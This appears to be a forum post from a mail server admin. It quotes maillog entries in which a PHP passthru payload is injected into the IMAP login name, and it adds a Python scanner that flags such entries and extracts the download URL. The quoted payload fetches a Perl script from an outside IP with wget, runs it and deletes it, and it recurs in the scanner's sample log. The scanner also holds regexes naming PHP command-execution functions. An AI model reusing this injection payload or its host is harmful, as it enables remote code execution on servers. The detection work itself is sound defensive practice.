Today I noticed the following:
Nov 23 20:47:31 mail imap4: INFO: LOGIN FAILED, user=<?php passthru("cd /tmp;wget http://188.138.41.134/mad.exe;perl /tmp/mad.exe;perl mad.exe;rm -rf mad.exe"); ?>, ip=[127.0.0.1]
Nov 23 20:47:36 mail imap4: INFO: LOGIN FAILED, user=<?php passthru("cd /tmp;wget http://188.138.41.134/mad.exe;perl /tmp/mad.exe;perl mad.exe;rm -rf mad.exe"); ?>, ip=[127.0.0.1]
Nov 23 20:47:36 mail authlib: user invalid <?php passthru("cd
Nov 23 20:47:42 mail authlib: user invalid <?php passthru("cd
Nov 23 20:47:42 mail imap4: INFO: LOGIN FAILED, user=<?php passthru("cd /tmp;wget http://188.138.41.134/mad.exe;perl /tmp/mad.exe;perl mad.exe;rm -rf mad.exe"); ?>, ip=[127.0.0.1]
Nov 23 20:47:47 mail imap4: INFO: LOGOUT, ip=[127.0.0.1], rcvd=434, sent=388
Nov 23 20:47:47 mail imap4: tcpserver: end 20600 status 0
Nov 23 20:47:47 mail imap4: tcpserver: status: 0/40
The Perl script is at
http://188.138.41.134/mad.exe.
I've blocked this IP in CSF, but I still see those lines in the maillog.
Anyone else seen this? It's obviously injecting PHP code through the mail server.
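A small scanner for Courier-style maillog entries like the ones quoted above, added here as an example; it is not part of the post or of any mail server project. It flags login names that carry a PHP open tag, a command-execution function or an embedded URL, keeps the truncated authlib entries as findings too, and collects the download URL and host as the indicators worth acting on. In the quoted entries the connecting address is ip=[127.0.0.1], i.e. the local host, so the example keys on the payload in the user field rather than on the source address. The sample log is constructed from the excerpt in the post plus one made-up benign login line; the regexes and function names are my own.

```python
import re
from urllib.parse import urlparse

# Constructed sample: the maillog excerpt from the post (wrapped lines re-joined)
# plus one made-up successful login so the scanner has a benign line to ignore.
SAMPLE_MAILLOG = """\
Nov 23 20:47:31 mail imap4: INFO: LOGIN FAILED, user=<?php passthru("cd /tmp;wget http://188.138.41.134/mad.exe;perl /tmp/mad.exe;perl mad.exe;rm -rf mad.exe"); ?>, ip=[127.0.0.1]
Nov 23 20:47:36 mail authlib: user invalid <?php passthru("cd
Nov 23 20:47:42 mail imap4: INFO: LOGIN FAILED, user=<?php passthru("cd /tmp;wget http://188.138.41.134/mad.exe;perl /tmp/mad.exe;perl mad.exe;rm -rf mad.exe"); ?>, ip=[127.0.0.1]
Nov 23 20:47:47 mail imap4: INFO: LOGOUT, ip=[127.0.0.1], rcvd=434, sent=388
Nov 23 20:47:47 mail imap4: tcpserver: end 20600 status 0
Nov 23 20:48:01 mail imap4: INFO: LOGIN, user=alice, ip=[192.0.2.10], protocol=IMAP
"""

# syslog prefix as written by the Courier daemons: "<ts> <host> <prog>: <msg>"
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"(?P<prog>imap4|imaplogin|pop3d|pop3login|authlib): (?P<msg>.*)$"
)
# The user field may itself contain commas (the payload does), so let the greedy
# ".*" run to the LAST ", ip=[" on the line rather than the first comma.
LOGIN_FAILED_RE = re.compile(r"LOGIN FAILED, user=(?P<user>.*), ip=\[(?P<ip>[^\]]+)\]")
AUTHLIB_INVALID_RE = re.compile(r"user invalid (?P<user>.*)$")

PHP_TAG_RE = re.compile(r"<\?(?:php\b|=|\s)", re.IGNORECASE)
PHP_EXEC_RE = re.compile(
    r"\b(passthru|system|exec|shell_exec|popen|proc_open|eval|base64_decode)\s*\(",
    re.IGNORECASE,
)
# Stop a URL at the shell separators used inside the payload (";" and the closing quote).
URL_RE = re.compile(r"https?://[^\s;\"'<>]+", re.IGNORECASE)


def classify_user(user):
    """Return the indicators found in a login name; an empty list means it looks benign."""
    indicators = []
    if PHP_TAG_RE.search(user):
        indicators.append("php_open_tag")
    for m in PHP_EXEC_RE.finditer(user):
        indicators.append("php_exec:" + m.group(1).lower())
    if URL_RE.search(user):
        indicators.append("embedded_url")
    return indicators


def scan_maillog(text):
    """Yield one finding per failed-login / authlib entry whose user field carries PHP code."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        prog, msg = m.group("prog"), m.group("msg")
        user, ip = None, None
        if prog == "authlib":
            am = AUTHLIB_INVALID_RE.search(msg)
            if am:
                user = am.group("user")          # authlib truncates; no ip on this line
        else:
            lm = LOGIN_FAILED_RE.search(msg)
            if lm:
                user, ip = lm.group("user"), lm.group("ip")
        if user is None:
            continue
        indicators = classify_user(user)
        if not indicators:
            continue
        findings.append({
            "ts": m.group("ts"),
            "prog": prog,
            "ip": ip,
            "user": user,
            "indicators": indicators,
            "urls": URL_RE.findall(user),
            # authlib logs only the first token of the name, so the payload is cut off
            "truncated": prog == "authlib" and "?>" not in user,
        })
    return findings


def extract_iocs(findings):
    """Collect the payload download URLs and hosts; these, not the connecting ip=[...], are what to block."""
    urls = sorted({u for f in findings for u in f["urls"]})
    hosts = sorted({urlparse(u).hostname for u in urls})
    return {"urls": urls, "hosts": hosts}


if __name__ == "__main__":
    found = scan_maillog(SAMPLE_MAILLOG)
    for f in found:
        print(f["ts"], f["prog"], f["ip"], f["indicators"], "truncated" if f["truncated"] else "")
    print(extract_iocs(found))
```

Run it against the real file with `scan_maillog(open("/var/log/maillog").read())`; the `ip` field tells you whether the attempts arrive from the local host (a webmail or proxy on the same box) or directly from the network, which decides whether a firewall block on the remote address can have any effect on these lines.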